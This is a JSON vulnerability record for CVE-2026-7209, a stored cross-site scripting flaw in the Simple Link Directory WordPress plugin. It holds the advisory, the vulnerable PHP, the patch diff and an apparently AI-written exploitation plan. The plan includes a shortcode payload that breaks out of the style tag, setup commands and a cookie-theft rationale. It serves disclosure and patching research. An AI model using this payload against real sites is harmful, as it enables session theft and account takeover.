[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flhzscQtTaZHna9HyHj78lPOoAim0-oDmEMC59y6HjV8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-7209","simple-link-directory-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Simple Link Directory \u003C= 8.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Simple Link Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `qcopd-directory` shortcode in all versions up to, and including, 8.9.2. This is due to insufficient input sanitization and output escaping on user supplied attributes such as `title_font_size`. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","simple-link-directory",null,"\u003C=8.9.2","8.9.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 14:45:40","2026-05-02 03:36:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9a7ca5f6-89c0-49ce-9aef-2208365c6151?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fjs\u002Fqcopd-admin-common.js","embed\u002Fcss\u002Fembed-form.css","qc-op-directory-main.php","qc-op-directory-shortcodes.php","readme.txt","templates\u002Fsimple\u002Ftemplate.php","templates\u002Fstyle-1\u002Ftemplate.php","templates\u002Fstyle-16\u002Ftemplate.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-7209\n\n## 1. Vulnerability Summary\nThe **Simple Link Directory** plugin (\u003C= 8.9.2) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[qcopd-directory]` shortcode. Specifically, several attributes such as `title_font_size`, `subtitle_font_size`, `title_line_height`, and `subtitle_line_height` are passed directly into CSS blocks via the WordPress function `wp_add_inline_style` without sufficient sanitization or escaping. This allows an authenticated attacker (Contributor level or higher) to inject arbitrary HTML and JavaScript by breaking out of the `\u003Cstyle>` context.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The standard WordPress post\u002Fpage editor.\n*   **Shortcode:** `[qcopd-directory]`\n*   **Vulnerable Parameter:** Shortcode attributes, specifically `title_font_size`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts\u002Fpages and use shortcodes but cannot publish them without approval. However, the XSS will execute for any user (including Administrators) who previews the draft or views the published post.\n*   **Precondition:** At least one \"Link Directory\" (custom post type `sld`) must exist for the shortcode to process the template files containing the vulnerability.\n\n## 3. Code Flow\n1.  **Registration:** The shortcode is registered in `qc-op-directory-shortcodes.php`:\n    ```php\n    add_shortcode('qcopd-directory', 'qcopd_directory_full_shortcode');\n    ```\n2.  **Processing:** `qcopd_directory_full_shortcode` calls `show_qcopd_full_list($atts)`.\n3.  **Extraction:** `show_qcopd_full_list` uses `extract(shortcode_atts(...))` to populate variables like `$title_font_size` and `$style`.\n4.  **Template Loading:** Depending on the `style` attribute (default: `simple`), the plugin includes a template file (e.g., `templates\u002Fsimple\u002Ftemplate.php`).\n5.  **Vulnerable Sink:** Inside `templates\u002Fsimple\u002Ftemplate.php`, the `$title_font_size` variable is used to construct a CSS string for `wp_add_inline_style`:\n    ```php\n    $customcss = '';\n    $customcss .= '#list-item-'.$listId .'-'. get_the_ID().'.simple ul li a{';\n    if($title_font_size!=''){\n        $customcss .= 'font-size:'.$title_font_size.';';\n    }\n    \u002F\u002F ...\n    wp_add_inline_style( 'sld-css-simple', $customcss );\n    ```\n6.  **Rendering:** WordPress outputs the contents of `$customcss` inside a `\u003Cstyle>` block. An attacker can use `\u003C\u002Fstyle>` to close the block and inject a `\u003Cscript>` tag.\n\n## 4. Nonce Acquisition Strategy\nSince this is an authenticated Stored XSS vulnerability performed via the WordPress post editor, the attacker needs a standard WordPress **post nonce** and **cookie** to create\u002Fedit a post.\n1.  Log in as a **Contributor**.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Extract the `_wpnonce` from the HTML form:\n    *   `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  Use this nonce in the `http_request` to save the post containing the malicious shortcode.\n\n## 5. Exploitation Strategy\n1.  **Identify Target:** Ensure at least one `sld` (Link Directory) post exists.\n2.  **Craft Payload:** Create a shortcode attribute that breaks the CSS and style tag:\n    *   `title_font_size='20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>'`\n3.  **Inject Shortcode:** Create a new page\u002Fpost with the following content:\n    *   `[qcopd-directory style=\"simple\" title_font_size='20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n4.  **Trigger Execution:** Access the permalink of the post (or the preview URL if only saved as a draft).\n\n## 6. Test Data Setup\nBefore exploitation, the environment must be prepared using `wp-cli`:\n1.  **Create Contributor User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Create a Link Directory (sld) post:** (The shortcode requires at least one list to exist to trigger the template rendering logic).\n    ```bash\n    wp post create --post_type=sld --post_title=\"Test Directory\" --post_status=publish\n    ```\n\n## 7. Expected Results\nWhen the page containing the shortcode is loaded:\n1.  The WordPress engine processes the `[qcopd-directory]` shortcode.\n2.  The plugin enqueues the `sld-css-simple` stylesheet.\n3.  The plugin calls `wp_add_inline_style` with the payload.\n4.  The HTML response will contain:\n    ```html\n    \u003Cstyle id='sld-css-simple-inline-css' type='text\u002Fcss'>\n    ... font-size:20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>;}\n    \u003C\u002Fstyle>\n    ```\n5.  The browser executes `alert(document.domain)`.\n\n## 8. Verification Steps\n1.  **Verify Post Content:** Use `wp-cli` to check the stored shortcode:\n    ```bash\n    wp post get [POST_ID] --field=post_content\n    ```\n2.  **Verify Source Output:** Use `http_request` to fetch the page and grep for the broken style tag:\n    ```bash\n    http_request GET \"http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]\" | grep \"\u003C\u002Fstyle>\u003Cscript>alert\"\n    ```\n\n## 9. Alternative Approaches\n*   **Other Attributes:** If `title_font_size` is sanitized in a specific environment, try `subtitle_font_size`, `title_line_height`, or `subtitle_line_height` across different styles (e.g., `style=\"style-1\"`).\n*   **Other Styles:** The vulnerability exists in multiple template files:\n    *   `templates\u002Fsimple\u002Ftemplate.php`\n    *   `templates\u002Fstyle-1\u002Ftemplate.php`\n    *   `templates\u002Fstyle-16\u002Ftemplate.php`\n*   **CSS-Based XSS:** In some modern browsers, if `\u003Cscript>` is filtered, one could attempt XSS via `background-image: url(\"javascript:...\")` or similar CSS vectors, although this is largely mitigated in modern engines compared to the `\u003Cstyle>` breakout.","The Simple Link Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [qcopd-directory] shortcode. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into pages by using crafted shortcode attributes, such as title_font_size, which are inserted into inline CSS blocks without sanitization or escaping.","\u002F* templates\u002Fsimple\u002Ftemplate.php lines 53-62 *\u002F\n\t\t\u003C?php if( $style == \"simple\" ): \n\t\t\t$customcss = '';\n\t\t\t$customcss .= '#list-item-'.$listId .'-'. get_the_ID().'.simple ul li a{';\n\t\t\tif($title_font_size!=''){\n\t\t\t\t$customcss .= 'font-size:'.$title_font_size.';';\n\t\t\t}\n\t\t\tif($title_line_height!=''){\n\t\t\t\t$customcss .= 'line-height:'.$title_line_height.';';\n\t\t\t}\n\t\t\t$customcss .= '}';\n\t\t\twp_add_inline_style( 'sld-css-simple', $customcss );\n\t\t?>\n\n---\n\n\u002F* templates\u002Fstyle-1\u002Ftemplate.php lines 105-122 *\u002F\n\t\t\u003C?php if( $style == \"style-1\" ) : \n\t\t\n\t\t$customcss = '';\n\t\t$customcss .= '#qcopd-list-'.$listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-main {';\n\t\tif($title_font_size!=''){\n\t\t\t$customcss .= 'font-size:'.$title_font_size.' !important;';\n\t\t}\n\t\tif($title_line_height!=''){\n\t\t\t$customcss .= 'line-height:'.$title_line_height.' !important;';\n\t\t}\n\t\t$customcss .= '}';\n\t\t$customcss .= '#qcopd-list-'. $listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-sub {';\n\t\tif($subtitle_font_size!=''){\n\t\t\t$customcss .= 'font-size:'. $subtitle_font_size.' !important;';\n\t\t}\n\t\tif($subtitle_line_height!=''){\n\t\t\t$customcss .= 'line-height:'. $subtitle_line_height.'!important;';\n\t\t}\n\t\t$customcss .= '}';\n\t\twp_add_inline_style( 'sld-css-style-1', $customcss );\n\t\t?>","--- templates\u002Fsimple\u002Ftemplate.php\n+++ templates\u002Fsimple\u002Ftemplate.php\n@@ -55,10 +55,10 @@\n \t\t\t$customcss = '';\n \t\t\t$customcss .= '#list-item-'.$listId .'-'. get_the_ID().'.simple ul li a{';\n \t\t\tif($title_font_size!=''){\n-\t\t\t\t$customcss .= 'font-size:'.$title_font_size.';';\n+\t\t\t\t$customcss .= 'font-size:'.esc_attr($title_font_size).';';\n \t\t\t}\n \t\t\tif($title_line_height!=''){\n-\t\t\t\t$customcss .= 'line-height:'.$title_line_height.';';\n+\t\t\t\t$customcss .= 'line-height:'.esc_attr($title_line_height).';';\n \t\t\t}\n \t\t\t$customcss .= '}';\n \t\t\twp_add_inline_style( 'sld-css-simple', $customcss );\n--- templates\u002Fstyle-1\u002Ftemplate.php\n+++ templates\u002Fstyle-1\u002Ftemplate.php\n@@ -107,20 +107,20 @@\n \t\t$customcss = '';\n \t\t$customcss .= '#qcopd-list-'.$listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-main {';\n \t\tif($title_font_size!=''){\n-\t\t\t$customcss .= 'font-size:'.$title_font_size.' !important;';\n+\t\t\t$customcss .= 'font-size:'.esc_attr($title_font_size).' !important;';\n \t\t}\n \t\tif($title_line_height!=''){\n-\t\t\t$customcss .= 'line-height:'.$title_line_height.' !important;';\n+\t\t\t$customcss .= 'line-height:'.esc_attr($title_line_height).' !important;';\n \t\t}\n \t\t$customcss .= '}';\n \t\t$customcss .= '#qcopd-list-'. $listId .'-'. get_the_ID().'.style-1 .ca-menu li .ca-sub {';\n \t\tif($subtitle_font_size!=''){\n-\t\t\t$customcss .= 'font-size:'. $subtitle_font_size.' !important;';\n+\t\t\t$customcss .= 'font-size:'.esc_attr($subtitle_font_size).' !important;';\n \t\t}\n \t\tif($subtitle_line_height!=''){\n-\t\t\t$customcss .= 'line-height:'. $subtitle_line_height.'!important;';\n+\t\t\t$customcss .= 'line-height:'.esc_attr($subtitle_line_height).'!important;';\n \t\t}\n \t\t$customcss .= '}';\n \t\twp_add_inline_style( 'sld-css-style-1', $customcss );","1. Obtain Contributor-level credentials (or higher) to a WordPress site using the Simple Link Directory plugin.\n2. Ensure at least one 'Link Directory' (sld post type) exists, as the vulnerable template logic only triggers when a directory list is being rendered.\n3. Create or edit a WordPress post and insert the [qcopd-directory] shortcode.\n4. Set a malicious payload for the 'title_font_size' (or other similar font\u002Fheight attributes) that closes the CSS block and style tag, then executes arbitrary JavaScript. Payload example: [qcopd-directory style=\"simple\" title_font_size=\"20px; } \u003C\u002Fstyle>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]\n5. Save the post as a draft or publish it. The XSS will execute for any user (including administrators) who previews or views the post, allowing the attacker to potentially capture cookies or perform actions on behalf of the victim.","gemini-3-flash-preview","2026-05-04 17:21:48","2026-05-04 17:22:22",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","8.9.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags\u002F8.9.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-link-directory.8.9.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags\u002F8.9.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsimple-link-directory.8.9.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsimple-link-directory\u002Ftags"]